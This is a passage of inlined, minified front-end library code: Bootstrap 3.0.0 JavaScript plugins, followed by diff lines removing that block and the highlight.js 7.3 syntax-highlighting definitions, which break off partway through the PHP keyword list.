this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},b.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show),void 0):c.show()},b.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type);return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide),void 0):c.hide()},b.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){if(this.$element.trigger(b),b.isDefaultPrevented())return;var c=this.tip();this.setContent(),this.options.animation&&c.addClass("fade");var d="function"==typeof this.options.placement?this.options.placement.call(this,c[0],this.$element[0]):this.options.placement,e=/\s?auto?\s?/i,f=e.test(d);f&&(d=d.replace(e,"")||"top"),c.detach().css({top:0,left:0,display:"block"}).addClass(d),this.options.container?c.appendTo(this.options.container):c.insertAfter(this.$element);var g=this.getPosition(),h=c[0].offsetWidth,i=c[0].offsetHeight;if(f){var j=this.$element.parent(),k=d,l=document.documentElement.scrollTop||document.body.scrollTop,m="body"==this.options.container?window.innerWidth:j.outerWidth(),n="body"==this.options.container?window.innerHeight:j.outerHeight(),o="body"==this.options.container?0:j.offset().left;d="bottom"==d&&g.top+g.height+i-l>n?"top":"top"==d&&g.top-l-i<0?"bottom":"right"==d&&g.right+h>m?"left":"left"==d&&g.left-h<o?"right":d,c.removeClass(k).addClass(d)}var p=this.getCalculatedOffset(d,g,h,i);this.applyPlacement(p,d),this.$element.trigger("shown.bs."+this.type)}},b.prototype.applyPlacement=function(a,b){var c,d=this.tip(),e=d[0].offsetWidth,f=d[0].offsetHeight,g=parseInt(d.css("margin-top"),10),h=parseInt(d.css("margin-left"),10);isNaN(g)&&(g=0),isNaN(h)&&(h=0),a.top=a.top+g,a.left=a.left+h,d.offset(a).addClass("in");var i=d[0].offsetWidth,j=d[0].offsetHeight;if("top"==b&&j!=f&&(c=!0,a.top=a.top+f-j),/bottom|top/.test(b)){var k=0;a.left<0&&(k=-2*a.left,a.left=0,d.offset(a),i=d[0].offsetWidth,j=d[0].offsetHeight),this.replaceArrow(k-e+i,i,"left")}else this.replaceArrow(j-f,j,"top");c&&d.offset(a)},b.prototype.replaceArrow=function(a,b,c){this.arrow().css(c,a?50*(1-a/b)+"%":"")},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle();a.find(".tooltip-inner")[this.options.html?"html":"text"](b),a.removeClass("fade in top bottom left right")},b.prototype.hide=function(){function b(){"in"!=c.hoverState&&d.detach()}var c=this,d=this.tip(),e=a.Event("hide.bs."+this.type);return this.$element.trigger(e),e.isDefaultPrevented()?void 0:(d.removeClass("in"),a.support.transition&&this.$tip.hasClass("fade")?d.one(a.support.transition.end,b).emulateTransitionEnd(150):b(),this.$element.trigger("hidden.bs."+this.type),this)},b.prototype.fixTitle=function(){var a=this.$element;(a.attr("title")||"string"!=typeof a.attr("data-original-title"))&&a.attr("data-original-title",a.attr("title")||"").attr("title","")},b.prototype.hasContent=function(){return this.getTitle()},b.prototype.getPosition=function(){var b=this.$element[0];return a.extend({},"function"==typeof b.getBoundingClientRect?b.getBoundingClientRect():{width:b.offsetWidth,height:b.offsetHeight},this.$element.offset())},b.prototype.getCalculatedOffset=function(a,b,c,d){return"bottom"==a?{top:b.top+b.height,left:b.left+b.width/2-c/2}:"top"==a?{top:b.top-d,left:b.left+b.width/2-c/2}:"left"==a?{top:b.top+b.height/2-d/2,left:b.left-c}:{top:b.top+b.height/2-d/2,left:b.left+b.width}},b.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},b.prototype.tip=function(){return this.$tip=this.$tip||a(this.options.template)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},b.prototype.validate=function(){this.$element[0].parentNode||(this.hide(),this.$element=null,this.options=null)},b.prototype.enable=function(){this.enabled=!0},b.prototype.disable=function(){this.enabled=!1},b.prototype.toggleEnabled=function(){this.enabled=!this.enabled},b.prototype.toggle=function(b){var c=b?a(b.currentTarget)[this.type](this.getDelegateOptions()).data("bs."+this.type):this;c.tip().hasClass("in")?c.leave(c):c.enter(c)},b.prototype.destroy=function(){this.hide().$element.off("."+this.type).removeData("bs."+this.type)};var c=a.fn.tooltip;a.fn.tooltip=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tooltip"),f="object"==typeof c&&c;e||d.data("bs.tooltip",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.tooltip.Constructor=b,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=c,this}}(window.jQuery),+function(a){"use strict";var b=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires tooltip.js");b.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:'<div class="popover"><div class="arrow"></div><h3 class="popover-title"></h3><div class="popover-content"></div></div>'}),b.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),b.prototype.constructor=b,b.prototype.getDefaults=function(){return b.DEFAULTS},b.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content")[this.options.html?"html":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},b.prototype.hasContent=function(){return this.getTitle()||this.getContent()},b.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},b.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")},b.prototype.tip=function(){return this.$tip||(this.$tip=a(this.options.template)),this.$tip};var c=a.fn.popover;a.fn.popover=function(c){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof c&&c;e||d.data("bs.popover",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.popover.Constructor=b,a.fn.popover.noConflict=function(){return a.fn.popover=c,this}}(window.jQuery),+function(a){"use strict";function b(c,d){var e,f=a.proxy(this.process,this);this.$element=a(c).is("body")?a(window):a(c),this.$body=a("body"),this.$scrollElement=this.$element.on("scroll.bs.scroll-spy.data-api",f),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||(e=a(c).attr("href"))&&e.replace(/.*(?=#[^\s]+$)/,"")||"")+" .nav li > a",this.offsets=a([]),this.targets=a([]),this.activeTarget=null,this.refresh(),this.process()}b.DEFAULTS={offset:10},b.prototype.refresh=function(){var b=this.$element[0]==window?"offset":"position";this.offsets=a([]),this.targets=a([]);var c=this;this.$body.find(this.selector).map(function(){var d=a(this),e=d.data("target")||d.attr("href"),f=/^#\w/.test(e)&&a(e);return f&&f.length&&[[f[b]().top+(!a.isWindow(c.$scrollElement.get(0))&&c.$scrollElement.scrollTop()),e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){c.offsets.push(this[0]),c.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.$scrollElement[0].scrollHeight||this.$body[0].scrollHeight,d=c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(b>=d)return g!=(a=f.last()[0])&&this.activate(a);for(a=e.length;a--;)g!=f[a]&&b>=e[a]&&(!e[a+1]||b<=e[a+1])&&this.activate(f[a])},b.prototype.activate=function(b){this.activeTarget=b,a(this.selector).parents(".active").removeClass("active");var c=this.selector+'[data-target="'+b+'"],'+this.selector+'[href="'+b+'"]',d=a(c).parents("li").addClass("active");d.parent(".dropdown-menu").length&&(d=d.closest("li.dropdown").addClass("active")),d.trigger("activate")};var c=a.fn.scrollspy;a.fn.scrollspy=function(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.scrollspy.Constructor=b,a.fn.scrollspy.noConflict=function(){return a.fn.scrollspy=c,this},a(window).on("load",function(){a('[data-spy="scroll"]').each(function(){var b=a(this);b.scrollspy(b.data())})})}(window.jQuery),+function(a){"use strict";var b=function(b){this.element=a(b)};b.prototype.show=function(){var b=this.element,c=b.closest("ul:not(.dropdown-menu)"),d=b.attr("data-target");if(d||(d=b.attr("href"),d=d&&d.replace(/.*(?=#[^\s]*$)/,"")),!b.parent("li").hasClass("active")){var e=c.find(".active:last a")[0],f=a.Event("show.bs.tab",{relatedTarget:e});if(b.trigger(f),!f.isDefaultPrevented()){var g=a(d);this.activate(b.parent("li"),c),this.activate(g,g.parent(),function(){b.trigger({type:"shown.bs.tab",relatedTarget:e})})}}},b.prototype.activate=function(b,c,d){function e(){f.removeClass("active").find("> .dropdown-menu > .active").removeClass("active"),b.addClass("active"),g?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu")&&b.closest("li.dropdown").addClass("active"),d&&d()}var f=c.find("> .active"),g=d&&a.support.transition&&f.hasClass("fade");g?f.one(a.support.transition.end,e).emulateTransitionEnd(150):e(),f.removeClass("in")};var c=a.fn.tab;a.fn.tab=function(c){return this.each(function(){var d=a(this),e=d.data("bs.tab");e||d.data("bs.tab",e=new b(this)),"string"==typeof c&&e[c]()})},a.fn.tab.Constructor=b,a.fn.tab.noConflict=function(){return a.fn.tab=c,this},a(document).on("click.bs.tab.data-api",'[data-toggle="tab"], [data-toggle="pill"]',function(b){b.preventDefault(),a(this).tab("show")})}(window.jQuery),+function(a){"use strict";var b=function(c,d){this.options=a.extend({},b.DEFAULTS,d),this.$window=a(window).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(c),this.affixed=this.unpin=null,this.checkPosition()};b.RESET="affix affix-top affix-bottom",b.DEFAULTS={offset:0},b.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},b.prototype.checkPosition=function(){if(this.$element.is(":visible")){var c=a(document).height(),d=this.$window.scrollTop(),e=this.$element.offset(),f=this.options.offset,g=f.top,h=f.bottom;"object"!=typeof f&&(h=g=f),"function"==typeof g&&(g=f.top()),"function"==typeof h&&(h=f.bottom());var i=null!=this.unpin&&d+this.unpin<=e.top?!1:null!=h&&e.top+this.$element.height()>=c-h?"bottom":null!=g&&g>=d?"top":!1;this.affixed!==i&&(this.unpin&&this.$element.css("top",""),this.affixed=i,this.unpin="bottom"==i?e.top-d:null,this.$element.removeClass(b.RESET).addClass("affix"+(i?"-"+i:"")),"bottom"==i&&this.$element.offset({top:document.body.offsetHeight-h-this.$element.height()}))}};var c=a.fn.affix;a.fn.affix=function(c){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof c&&c;e||d.data("bs.affix",e=new b(this,f)),"string"==typeof c&&e[c]()})},a.fn.affix.Constructor=b,a.fn.affix.noConflict=function(){return a.fn.affix=c,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var b=a(this),c=b.data();c.offset=c.offset||{},c.offsetBottom&&(c.offset.bottom=c.offsetBottom),c.offsetTop&&(c.offset.top=c.offsetTop),b.affix(c)})})}(window.jQuery);</script>
-<!-- END extlib/js/bootstrap-3.0.0.min.js -->
-<!-- START extlib/js/highlight-7.3.pack.min.js -->
-<script type="text/javascript">/* highlight.js Copyright (c) 2006, Ivan Sagalaev. Licensed under BSD 3-clause.
-   See https://github.com/isagalaev/highlight.js/blob/master/LICENSE */
-var hljs=new function(){function l(o){return o.replace(/&/gm,"&amp;").replace(/</gm,"&lt;").replace(/>/gm,"&gt;")}function b(p){for(var o=p.firstChild;o;o=o.nextSibling){if(o.nodeName=="CODE"){return o}if(!(o.nodeType==3&&o.nodeValue.match(/\s+/))){break}}}function h(p,o){return Array.prototype.map.call(p.childNodes,function(q){if(q.nodeType==3){return o?q.nodeValue.replace(/\n/g,""):q.nodeValue}if(q.nodeName=="BR"){return"\n"}return h(q,o)}).join("")}function a(q){var p=(q.className+" "+q.parentNode.className).split(/\s+/);p=p.map(function(r){return r.replace(/^language-/,"")});for(var o=0;o<p.length;o++){if(e[p[o]]||p[o]=="no-highlight"){return p[o]}}}function c(q){var o=[];(function p(r,s){for(var t=r.firstChild;t;t=t.nextSibling){if(t.nodeType==3){s+=t.nodeValue.length}else{if(t.nodeName=="BR"){s+=1}else{if(t.nodeType==1){o.push({event:"start",offset:s,node:t});s=p(t,s);o.push({event:"stop",offset:s,node:t})}}}}return s})(q,0);return o}function j(x,v,w){var p=0;var y="";var r=[];function t(){if(x.length&&v.length){if(x[0].offset!=v[0].offset){return(x[0].offset<v[0].offset)?x:v}else{return v[0].event=="start"?x:v}}else{return x.length?x:v}}function s(A){function z(B){return" "+B.nodeName+'="'+l(B.value)+'"'}return"<"+A.nodeName+Array.prototype.map.call(A.attributes,z).join("")+">"}while(x.length||v.length){var u=t().splice(0,1)[0];y+=l(w.substr(p,u.offset-p));p=u.offset;if(u.event=="start"){y+=s(u.node);r.push(u.node)}else{if(u.event=="stop"){var o,q=r.length;do{q--;o=r[q];y+=("</"+o.nodeName.toLowerCase()+">")}while(o!=u.node);r.splice(q,1);while(q<r.length){y+=s(r[q]);q++}}}}return y+l(w.substr(p))}function f(q){function o(s,r){return RegExp(s,"m"+(q.cI?"i":"")+(r?"g":""))}function p(y,w){if(y.compiled){return}y.compiled=true;var s=[];if(y.k){var r={};function z(A,t){t.split(" ").forEach(function(B){var C=B.split("|");r[C[0]]=[A,C[1]?Number(C[1]):1];s.push(C[0])})}y.lR=o(y.l||hljs.IR,true);if(typeof y.k=="string"){z("keyword",y.k)}else{for(var x in y.k){if(!y.k.hasOwnProperty(x)){continue}z(x,y.k[x])}}y.k=r}if(w){if(y.bWK){y.b="\\b("+s.join("|")+")\\s"}y.bR=o(y.b?y.b:"\\B|\\b");if(!y.e&&!y.eW){y.e="\\B|\\b"}if(y.e){y.eR=o(y.e)}y.tE=y.e||"";if(y.eW&&w.tE){y.tE+=(y.e?"|":"")+w.tE}}if(y.i){y.iR=o(y.i)}if(y.r===undefined){y.r=1}if(!y.c){y.c=[]}for(var v=0;v<y.c.length;v++){if(y.c[v]=="self"){y.c[v]=y}p(y.c[v],y)}if(y.starts){p(y.starts,w)}var u=[];for(var v=0;v<y.c.length;v++){u.push(y.c[v].b)}if(y.tE){u.push(y.tE)}if(y.i){u.push(y.i)}y.t=u.length?o(u.join("|"),true):{exec:function(t){return null}}}p(q)}function d(D,E){function o(r,M){for(var L=0;L<M.c.length;L++){var K=M.c[L].bR.exec(r);if(K&&K.index==0){return M.c[L]}}}function s(K,r){if(K.e&&K.eR.test(r)){return K}if(K.eW){return s(K.parent,r)}}function t(r,K){return K.i&&K.iR.test(r)}function y(L,r){var K=F.cI?r[0].toLowerCase():r[0];return L.k.hasOwnProperty(K)&&L.k[K]}function G(){var K=l(w);if(!A.k){return K}var r="";var N=0;A.lR.lastIndex=0;var L=A.lR.exec(K);while(L){r+=K.substr(N,L.index-N);var M=y(A,L);if(M){v+=M[1];r+='<span class="'+M[0]+'">'+L[0]+"</span>"}else{r+=L[0]}N=A.lR.lastIndex;L=A.lR.exec(K)}return r+K.substr(N)}function z(){if(A.sL&&!e[A.sL]){return l(w)}var r=A.sL?d(A.sL,w):g(w);if(A.r>0){v+=r.keyword_count;B+=r.r}return'<span class="'+r.language+'">'+r.value+"</span>"}function J(){return A.sL!==undefined?z():G()}function I(L,r){var K=L.cN?'<span class="'+L.cN+'">':"";if(L.rB){x+=K;w=""}else{if(L.eB){x+=l(r)+K;w=""}else{x+=K;w=r}}A=Object.create(L,{parent:{value:A}});B+=L.r}function C(K,r){w+=K;if(r===undefined){x+=J();return 0}var L=o(r,A);if(L){x+=J();I(L,r);return L.rB?0:r.length}var M=s(A,r);if(M){if(!(M.rE||M.eE)){w+=r}x+=J();do{if(A.cN){x+="</span>"}A=A.parent}while(A!=M.parent);if(M.eE){x+=l(r)}w="";if(M.starts){I(M.starts,"")}return M.rE?0:r.length}if(t(r,A)){throw"Illegal"}w+=r;return r.length||1}var F=e[D];f(F);var A=F;var w="";var B=0;var v=0;var x="";try{var u,q,p=0;while(true){A.t.lastIndex=p;u=A.t.exec(E);if(!u){break}q=C(E.substr(p,u.index-p),u[0]);p=u.index+q}C(E.substr(p));return{r:B,keyword_count:v,value:x,language:D}}catch(H){if(H=="Illegal"){return{r:0,keyword_count:0,value:l(E)}}else{throw H}}}function g(s){var o={keyword_count:0,r:0,value:l(s)};var q=o;for(var p in e){if(!e.hasOwnProperty(p)){continue}var r=d(p,s);r.language=p;if(r.keyword_count+r.r>q.keyword_count+q.r){q=r}if(r.keyword_count+r.r>o.keyword_count+o.r){q=o;o=r}}if(q.language){o.second_best=q}return o}function i(q,p,o){if(p){q=q.replace(/^((<[^>]+>|\t)+)/gm,function(r,v,u,t){return v.replace(/\t/g,p)})}if(o){q=q.replace(/\n/g,"<br>")}return q}function m(r,u,p){var v=h(r,p);var t=a(r);if(t=="no-highlight"){return}var w=t?d(t,v):g(v);t=w.language;var o=c(r);if(o.length){var q=document.createElement("pre");q.innerHTML=w.value;w.value=j(o,c(q),v)}w.value=i(w.value,u,p);var s=r.className;if(!s.match("(\\s|^)(language-)?"+t+"(\\s|$)")){s=s?(s+" "+t):t}r.innerHTML=w.value;r.className=s;r.result={language:t,kw:w.keyword_count,re:w.r};if(w.second_best){r.second_best={language:w.second_best.language,kw:w.second_best.keyword_count,re:w.second_best.r}}}function n(){if(n.called){return}n.called=true;Array.prototype.map.call(document.getElementsByTagName("pre"),b).filter(Boolean).forEach(function(o){m(o,hljs.tabReplace)})}function k(){window.addEventListener("DOMContentLoaded",n,false);window.addEventListener("load",n,false)}var e={};this.LANGUAGES=e;this.highlight=d;this.highlightAuto=g;this.fixMarkup=i;this.highlightBlock=m;this.initHighlighting=n;this.initHighlightingOnLoad=k;this.IR="[a-zA-Z][a-zA-Z0-9_]*";this.UIR="[a-zA-Z_][a-zA-Z0-9_]*";this.NR="\\b\\d+(\\.\\d+)?";this.CNR="(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)";this.BNR="\\b(0b[01]+)";this.RSR="!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|\\.|-|-=|/|/=|:|;|<|<<|<<=|<=|=|==|===|>|>=|>>|>>=|>>>|>>>=|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~";this.BE={b:"\\\\[\\s\\S]",r:0};this.ASM={cN:"string",b:"'",e:"'",i:"\\n",c:[this.BE],r:0};this.QSM={cN:"string",b:'"',e:'"',i:"\\n",c:[this.BE],r:0};this.CLCM={cN:"comment",b:"//",e:"$"};this.CBLCLM={cN:"comment",b:"/\\*",e:"\\*/"};this.HCM={cN:"comment",b:"#",e:"$"};this.NM={cN:"number",b:this.NR,r:0};this.CNM={cN:"number",b:this.CNR,r:0};this.BNM={cN:"number",b:this.BNR,r:0};this.inherit=function(q,r){var o={};for(var p in q){o[p]=q[p]}if(r){for(var p in r){o[p]=r[p]}}return o}}();hljs.LANGUAGES.bash=function(a){var g="true false";var e="if then else elif fi for break continue while in do done echo exit return set declare";var c={cN:"variable",b:"\\$[a-zA-Z0-9_#]+"};var b={cN:"variable",b:"\\${([^}]|\\\\})+}"};var h={cN:"string",b:'"',e:'"',i:"\\n",c:[a.BE,c,b],r:0};var d={cN:"string",b:"'",e:"'",c:[{b:"''"}],r:0};var f={cN:"test_condition",b:"",e:"",c:[h,d,c,b],k:{literal:g},r:0};return{k:{keyword:e,literal:g},c:[{cN:"shebang",b:"(#!\\/bin\\/bash)|(#!\\/bin\\/sh)",r:10},c,b,a.HCM,h,d,a.inherit(f,{b:"\\[ ",e:" \\]",r:0}),a.inherit(f,{b:"\\[\\[ ",e:" \\]\\]"})]}}(hljs);hljs.LANGUAGES.cs=function(a){return{k:"abstract as base bool break byte case catch char checked class const continue decimal default delegate do double else enum event explicit extern false finally fixed float for foreach goto if implicit in int interface internal is lock long namespace new null object operator out override params private protected public readonly ref return sbyte sealed short sizeof stackalloc static string struct switch this throw true try typeof uint ulong unchecked unsafe ushort using virtual volatile void while ascending descending from get group into join let orderby partial select set value var where yield",c:[{cN:"comment",b:"///",e:"$",rB:true,c:[{cN:"xmlDocTag",b:"///|<!--|-->"},{cN:"xmlDocTag",b:"</?",e:">"}]},a.CLCM,a.CBLCLM,{cN:"preprocessor",b:"#",e:"$",k:"if else elif endif define undef warning error line region endregion pragma checksum"},{cN:"string",b:'@"',e:'"',c:[{b:'""'}]},a.ASM,a.QSM,a.CNM]}}(hljs);hljs.LANGUAGES.ruby=function(e){var a="[a-zA-Z_][a-zA-Z0-9_]*(\\!|\\?)?";var j="[a-zA-Z_]\\w*[!?=]?|[-+~]\\@|<<|>>|=~|===?|<=>|[<>]=?|\\*\\*|[-/+%^&*~`|]|\\[\\]=?";var g={keyword:"and false then defined module in return redo if BEGIN retry end for true self when next until do begin unless END rescue nil else break undef not super class case require yield alias while ensure elsif or include"};var c={cN:"yardoctag",b:"@[A-Za-z]+"};var k=[{cN:"comment",b:"#",e:"$",c:[c]},{cN:"comment",b:"^\\=begin",e:"^\\=end",c:[c],r:10},{cN:"comment",b:"^__END__",e:"\\n$"}];var d={cN:"subst",b:"#\\{",e:"}",l:a,k:g};var i=[e.BE,d];var b=[{cN:"string",b:"'",e:"'",c:i,r:0},{cN:"string",b:'"',e:'"',c:i,r:0},{cN:"string",b:"%[qw]?\\(",e:"\\)",c:i},{cN:"string",b:"%[qw]?\\[",e:"\\]",c:i},{cN:"string",b:"%[qw]?{",e:"}",c:i},{cN:"string",b:"%[qw]?<",e:">",c:i,r:10},{cN:"string",b:"%[qw]?/",e:"/",c:i,r:10},{cN:"string",b:"%[qw]?%",e:"%",c:i,r:10},{cN:"string",b:"%[qw]?-",e:"-",c:i,r:10},{cN:"string",b:"%[qw]?\\|",e:"\\|",c:i,r:10}];var h={cN:"function",bWK:true,e:" |$|;",k:"def",c:[{cN:"title",b:j,l:a,k:g},{cN:"params",b:"\\(",e:"\\)",l:a,k:g}].concat(k)};var f=k.concat(b.concat([{cN:"class",bWK:true,e:"$|;",k:"class module",c:[{cN:"title",b:"[A-Za-z_]\\w*(::\\w+)*(\\?|\\!)?",r:0},{cN:"inheritance",b:"<\\s*",c:[{cN:"parent",b:"("+e.IR+"::)?"+e.IR}]}].concat(k)},h,{cN:"constant",b:"(::)?(\\b[A-Z]\\w*(::)?)+",r:0},{cN:"symbol",b:":",c:b.concat([{b:j}]),r:0},{cN:"symbol",b:a+":",r:0},{cN:"number",b:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",r:0},{cN:"number",b:"\\?\\w"},{cN:"variable",b:"(\\$\\W)|((\\$|\\@\\@?)(\\w+))"},{b:"("+e.RSR+")\\s*",c:k.concat([{cN:"regexp",b:"/",e:"/[a-z]*",i:"\\n",c:[e.BE,d]}]),r:0}]));d.c=f;h.c[1].c=f;return{l:a,k:g,c:f}}(hljs);hljs.LANGUAGES.javascript=function(a){return{k:{keyword:"in if for while finally var new function do return void else break catch instanceof with throw case default try this switch continue typeof delete let yield const",literal:"true false null undefined NaN Infinity"},c:[a.ASM,a.QSM,a.CLCM,a.CBLCLM,a.CNM,{b:"("+a.RSR+"|\\b(case|return|throw)\\b)\\s*",k:"return throw case",c:[a.CLCM,a.CBLCLM,{cN:"regexp",b:"/",e:"/[gim]*",i:"\\n",c:[{b:"\\\\/"}]},{b:"<",e:">;",sL:"xml"}],r:0},{cN:"function",bWK:true,e:"{",k:"function",c:[{cN:"title",b:"[A-Za-z$_][0-9A-Za-z$_]*"},{cN:"params",b:"\\(",e:"\\)",c:[a.CLCM,a.CBLCLM],i:"[\"'\\(]"}],i:"\\[|%"}]}}(hljs);hljs.LANGUAGES.xml=function(a){var c="[A-Za-z0-9\\._:-]+";var b={eW:true,c:[{cN:"attribute",b:c,r:0},{b:'="',rB:true,e:'"',c:[{cN:"value",b:'"',eW:true}]},{b:"='",rB:true,e:"'",c:[{cN:"value",b:"'",eW:true}]},{b:"=",c:[{cN:"value",b:"[^\\s/>]+"}]}]};return{cI:true,c:[{cN:"pi",b:"<\\?",e:"\\?>",r:10},{cN:"doctype",b:"<!DOCTYPE",e:">",r:10,c:[{b:"\\[",e:"\\]"}]},{cN:"comment",b:"<!--",e:"-->",r:10},{cN:"cdata",b:"<\\!\\[CDATA\\[",e:"\\]\\]>",r:10},{cN:"tag",b:"<style(?=\\s|>|$)",e:">",k:{title:"style"},c:[b],starts:{e:"</style>",rE:true,sL:"css"}},{cN:"tag",b:"<script(?=\\s|>|$)",e:">",k:{title:"script"},c:[b],starts:{e:"<\/script>",rE:true,sL:"javascript"}},{b:"",sL:"vbscript"},{cN:"tag",b:"</?",e:"/?>",c:[{cN:"title",b:"[^ />]+"},b]}]}}(hljs);hljs.LANGUAGES.markdown=function(a){return{c:[{cN:"header",b:"^#{1,3}",e:"$"},{cN:"header",b:"^.+?\\n[=-]{2,}$"},{b:"<",e:">",sL:"xml",r:0},{cN:"bullet",b:"^([*+-]|(\\d+\\.))\\s+"},{cN:"strong",b:"[*_]{2}.+?[*_]{2}"},{cN:"emphasis",b:"\\*.+?\\*"},{cN:"emphasis",b:"_.+?_",r:0},{cN:"blockquote",b:"^>\\s+",e:"$"},{cN:"code",b:"`.+?`"},{cN:"code",b:"^    ",e:"$",r:0},{cN:"horizontal_rule",b:"^-{3,}",e:"$"},{b:"\\[.+?\\]\\(.+?\\)",rB:true,c:[{cN:"link_label",b:"\\[.+\\]"},{cN:"link_url",b:"\\(",e:"\\)",eB:true,eE:true}]}]}}(hljs);hljs.LANGUAGES.css=function(a){var b={cN:"function",b:a.IR+"\\(",e:"\\)",c:[a.NM,a.ASM,a.QSM]};return{cI:true,i:"[=/|']",c:[a.CBLCLM,{cN:"id",b:"\\#[A-Za-z0-9_-]+"},{cN:"class",b:"\\.[A-Za-z0-9_-]+",r:0},{cN:"attr_selector",b:"\\[",e:"\\]",i:"$"},{cN:"pseudo",b:":(:)?[a-zA-Z0-9\\_\\-\\+\\(\\)\\\"\\']+"},{cN:"at_rule",b:"@(font-face|page)",l:"[a-z-]+",k:"font-face page"},{cN:"at_rule",b:"@",e:"[{;]",eE:true,k:"import page media charset",c:[b,a.ASM,a.QSM,a.NM]},{cN:"tag",b:a.IR,r:0},{cN:"rules",b:"{",e:"}",i:"[^\\s]",r:0,c:[a.CBLCLM,{cN:"rule",b:"[^\\s]",rB:true,e:";",eW:true,c:[{cN:"attribute",b:"[A-Z\\_\\.\\-]+",e:":",eE:true,i:"[^\\s]",starts:{cN:"value",eW:true,eE:true,c:[b,a.NM,a.QSM,a.ASM,a.CBLCLM,{cN:"hexcolor",b:"\\#[0-9A-F]+"},{cN:"important",b:"!important"}]}}]}]}]}}(hljs);hljs.LANGUAGES.http=function(a){return{i:"\\S",c:[{cN:"status",b:"^HTTP/[0-9\\.]+",e:"$",c:[{cN:"number",b:"\\b\\d{3}\\b"}]},{cN:"request",b:"^[A-Z]+ (.*?) HTTP/[0-9\\.]+$",rB:true,e:"$",c:[{cN:"string",b:" ",e:" ",eB:true,eE:true}]},{cN:"attribute",b:"^\\w",e:": ",eE:true,i:"\\n|\\s|=",starts:{cN:"string",e:"$"}},{b:"\\n\\n",starts:{sL:"",eW:true}}]}}(hljs);hljs.LANGUAGES.java=function(a){return{k:"false synchronized int abstract float private char boolean static null if const for true while long throw strictfp finally protected import native final return void enum else break transient new catch instanceof byte super volatile case assert short package default double public try this switch continue throws",c:[{cN:"javadoc",b:"/\\*\\*",e:"\\*/",c:[{cN:"javadoctag",b:"@[A-Za-z]+"}],r:10},a.CLCM,a.CBLCLM,a.ASM,a.QSM,{cN:"class",bWK:true,e:"{",k:"class interface",i:":",c:[{bWK:true,k:"extends implements",r:10},{cN:"title",b:a.UIR}]},a.CNM,{cN:"annotation",b:"@[A-Za-z]+"}]}}(hljs);hljs.LANGUAGES.php=function(a){var e={cN:"variable",b:"\\$+[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*"};var b=[a.inherit(a.ASM,{i:null}),a.inherit(a.QSM,{i:null}),{cN:"string",b:'b"',e:'"',c:[a.BE]},{cN:"string",b:"b'",e:"'",c:[a.BE]}];var c=[a.BNM,a.CNM];var d={cN:"title",b:a.UIR};return{cI:true,k:"and include_once list abstract global private echo interface as static endswitch array null if endwhile or const for endforeach self var while isset public protected exit foreach throw elseif include __FILE__ empty require_once do xor return implements parent clone use __CLASS__ __LINE__ else break print eval new catch __METHOD__ case exception php_user_filter default die require __FUNCTION__ enddeclare final try this switch continue endfor endif declare unset true false namespace trait goto instanceof insteadof __DIR__ __NAMESPACE__ 